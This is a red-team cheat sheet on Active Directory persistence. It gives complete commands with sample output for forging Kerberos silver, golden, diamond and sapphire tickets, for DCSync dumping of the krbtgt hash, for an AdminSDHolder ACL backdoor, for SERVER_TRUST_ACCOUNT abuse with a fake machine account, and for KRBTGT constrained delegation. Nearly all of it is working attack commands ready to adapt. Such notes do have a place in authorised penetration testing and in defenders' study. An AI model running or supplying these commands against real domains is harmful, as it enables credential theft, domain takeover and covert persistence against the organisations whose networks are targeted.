Silver Ticket
Windows Linux
Copy Cmd > Rubeus.exe s4u /domain:megacorp.local /dc:dc1.megacorp.local /user:SRV01$ /rc4:fc525c9683e8fe067095ba2ddc971889 /altservice:http/srv01.megacorp.local /impersonateuser:Administrator /self /ptt
Copy $ getST.py megacorp.local/'SRV01$' -hashes :fc525c9683e8fe067095ba2ddc971889 -dc-ip 192.168.1.11 -spn ldap/srv01.megacorp.local -impersonate 'Administrator' Golden Ticket
Windows Linux
Copy Cmd > .\mimikatz.exe "kerberos::golden /domain:megacorp.local /user:snovvcrash /sid:<SID> /krbtgt:<NTHASH> /ptt [/startoffset:-10 /endin:60 /renewmax:10080]" "exit"
Cmd > .\mimikatz.exe "lsadump::dcsync /user:megacorp.local\krbtgt /domain:megacorp.local" "exit"
Copy $ ticketer.py -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 {-nthash <RC4_32> | -aesKey <AES_64> } [-groups '512,513,516,518,519,520'] [-user-id 1337] [-duration 87600] snovvcrash
$ export KRB5CCNAME=`readlink -f snovvcrash.ccache`
$ psexec.py megacorp.local/snovvcrash@DC01.megacorp.local -k -no-pass
$ secretsdump.py megacorp.local/snovvcrash@DC01.megacorp.local -dc-ip 10.10.13.37 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass Diamond Ticket
Copy $ ticketer.py -request -user lowpriv -password 'Passw0rd!' -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -aesKey <AES_KEY> [-groups '512,513,516,518,519,520'] [-user-id 1337] [-duration 87600] snovvcrash Sapphire Ticket
Copy $ ticketer.py -request -user lowpriv -password 'Passw0rd!' -impersonate administrator -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -nthash <NT_HASH> -aesKey <AES_KEY> administrator AdminSDHolder Modification
Create a Backdoor
Add a new domain user or grant an existent user GenericAll permissions for the AdminSDHolder container:
Copy PV3 > Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -TargetDomain megacorp.local -PrincipalIdentity snovvcrash -PrincipalDomain megacorp.local -Rights All -Verbose Check that granting AdminSDHolder permissions was successful (may take 60+ minutes for the security ACLs to get updated for that user):
Copy PV3 > Get-DomainUser snovvcrash | select objectsid
S-1-5-21-2284550090-1208917427-1204316795-9824
PV3 > Get-DomainObjectAcl -Identity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
AceType : AccessAllowed
ObjectDN : CN=AdminSDHolder,CN=System,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID :
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed Now you can add yourself (the "snovvcrash" user) to the Domain Admins group any time and do stuff (actually adding the user to Domain Admins every time is not necessary, as the AdminCount attribute will stay 1 anyways after adding the backdoor user to a protected group for the first time):
Copy PV3 > Add-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainObjectAcl -Identity "Domain Admins" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2284550090-1208917427-1204316795-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
PV3 > Remove-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainUser snovvcrash | select admincount
admincount
----------
1 Remove the Backdoor
Disable or remove the account (if a new user was created):
Copy PS > net user snovvcrash /domain /active:no
PS > net user snovvcrash /domain /del Remove user AdminSDHolder container via GUI (ADUC, dsa.msc).
Clear the AdminCount attribute (will be resetted if the user is still in the AdminSDHolder container):
Copy PV3 > Set-DomainObject -Identity snovvcrash -Domain megacorp.local -Clear admincount -Verbose
Or
PS > Get-ADUser snovvcrash | Set-ADObject -Clear admincount Fix the inheritance rules:
Copy PS > [bool]$isProtected = $false
PS > [bool]$PreserveInheritance = $true
PS > [string]$dn = (Get-ADUser snovvcrash).DistinguishedName
PS > $user = [ADSI]"LDAP://$dn"
PS > $acl = $user.objectSecurity
PS > $acl.AreAccessRulesProtected
True # procced if True
PS > $acl.SetAccessRuleProtection($isProtected, $PreserveInheritance)
PS > $inherited = $acl.AreAccessRulesProtected
PS > $user.commitchanges()
PS > $acl.AreAccessRulesProtected
False SERVER_TRUST_ACCOUNT
When DA is owned (or any other account with DS-Install-Replica permission), you can create a fake machine account (or use an existing real machine account), set SERVER_TRUST_ACCOUNT bit for it and perform DCSync on behalf of this account to regain domain dominance.
1. Create a fake machine account:
Copy PM > New-MachineAccount -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
name primarygroupid useraccountcontrol
---- -------------- ------------------
FakeMachine 515 WORKSTATION_TRUST_ACCOUNT 2. Set the SERVER_TRUST_ACCOUNT bit:
Copy PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=8192}
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
name primarygroupid useraccountcontrol
---- -------------- ------------------
FakeMachine 516 SERVER_TRUST_ACCOUNT 3. Perform DCSync:
Copy $ secretsdump.py MEGACORP/'FakeMachine$:Passw0rd!'@DC01.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt' 4. Clean up:
Copy PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=4096}
Or
PM > Remove-MachineAccount -MachineAccount FakeMachine KRBTGT Constrained Delegation
Windows Linux
Copy # create a new service account (or abuse an existing one)
PM > New-MachineAccount -Domain megacorp.local -DomainController DC01.megacorp.local -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force) -Verbose
# set UAC to be 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=16781312} -Verbose
# set the krbtgt SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{"msDS-AllowedToDelegateTo"=@("krbtgt/MEGACORP")} -Verbose
# request TGS via S4U (will act as a TGT of the impersonated user)
PS > .\Rubeus.exe s4u /domain:megacorp.net /user:FakeMachine$ /rc4:b2bdbe60565b677dfb133866722317fd /impersonateuser:snovvcrash /msdsspn:krbtgt/MEGACORP /ptt
# cleanup: remove the SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Clear msDS-AllowedToDelegateTo -Verbose
# cleanup: back to UAC 'WORKSTATION_TRUST_ACCOUNT'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=4096} -Verbose
Copy # create a new service account (or abuse an existing one)
$ addcomputer.py -computer-name Persist1 -computer-pass 'Passw0rd1!' -dc-ip 192.168.1.11 megacorp.local/lowpriv:'Passw0rd2!'
# set UAC to be' WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION' and set the krbtgt SPN for delegation
$ python3 setCD.py megacorp.local/administrator:'Passw0rd3!' -dc-ip 192.168.1.11 -target 'Persist1$' -spn krbtgt/MEGACORP
# request TGS via S4U (will act as a TGT of the impersonated user)
$ getST.py -spn krbtgt/MEGACORP megacorp.local/'Persist1$:Passw0rd1!' -dc-ip 192.168.1.11 -impersonate 'DC01$'
# fire DCSync
$ KRB5CCNAME=`pwd`/'DC01$.ccache' secretsdump.py DC01.megacorp.local -dc-ip 192.168.1.11 -k -no-pass -just-dc 